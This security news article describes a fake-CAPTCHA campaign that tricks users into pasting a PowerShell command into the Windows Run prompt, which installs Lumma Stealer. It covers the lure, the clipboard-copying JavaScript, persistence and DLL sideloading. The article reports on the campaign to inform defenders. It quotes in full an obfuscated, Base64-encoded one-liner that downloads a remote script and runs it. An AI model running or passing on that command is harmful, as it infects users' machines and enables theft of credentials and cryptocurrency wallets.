A growing attack trend since the second half of 2024 involves threat actors using fake CAPTCHA challenges to trick users into executing malicious PowerShell commands and infecting their systems with dangerous malware.
These sophisticated social engineering tactics leverage users’ familiarity with legitimate CAPTCHA verification processes to deliver Lumma Stealer, an information-stealing malware capable of extracting cryptocurrency wallets and other sensitive data.
The attack begins when users are lured to malicious websites through web advertisements, search engine optimization hijacking, or redirects from compromised websites.
.png
)
These malicious sites display fake CAPTCHA verification challenges that appear legitimate, often mimicking widely recognized CAPTCHA interfaces.
HP analysts noted that attackers are primarily relying on cloud hosting providers that offer free credits to new users, providing sufficient resources to run malware campaigns.
This approach helps circumvent detection because the IP addresses and domains are often reputable, enabling threat actors to bypass network security like web proxies that rely on web reputation.
When users interact with these fake CAPTCHAs by clicking the “I’m not a robot” button, malicious JavaScript code executes in the background, secretly copying a PowerShell command to the user’s clipboard.
The user is then instructed to open the Windows Run prompt using the WIN+R keyboard shortcut and paste the content using CTRL+V, unknowingly executing the malicious code.
The PowerShell command is deliberately obfuscated and short, appearing as: pOweRSHelL -w hiDdEn "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vZmlsZXpjdnNkcy5iLWNkbi5uZXQvZ2t6SGRxZmcudHh0JYAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex" as seen in Figure 3. This command downloads and executes a much larger malicious script that can exceed 50 MB in size.
Infection Chain
The downloaded script checks if the malware already exists on the device and, if not, decodes a Base64 string into a ZIP archive stored in the AppData folder.
After extraction, it executes a file named Set-up.exe and creates a Registry run key named “NetUtilityApp” for persistence.
.webp)
The malware uses a technique called DLL sideloading, where a legitimate signed executable loads several DLLs, one of which (StarBurn.dll) contains the malicious Lumma Stealer payload.
.webp)
The JavaScript code responsible for this attack, creates a temporary text area element, copies the PowerShell command to the clipboard, and then removes the element to hide evidence of the operation.
This sophisticated technique allows attackers to bypass traditional security mechanisms by leveraging legitimate user actions to initiate the infection process.
Investigate Real-World Malicious Links & Phishing Attacks With Threat Intelligence Lookup - Try for Free
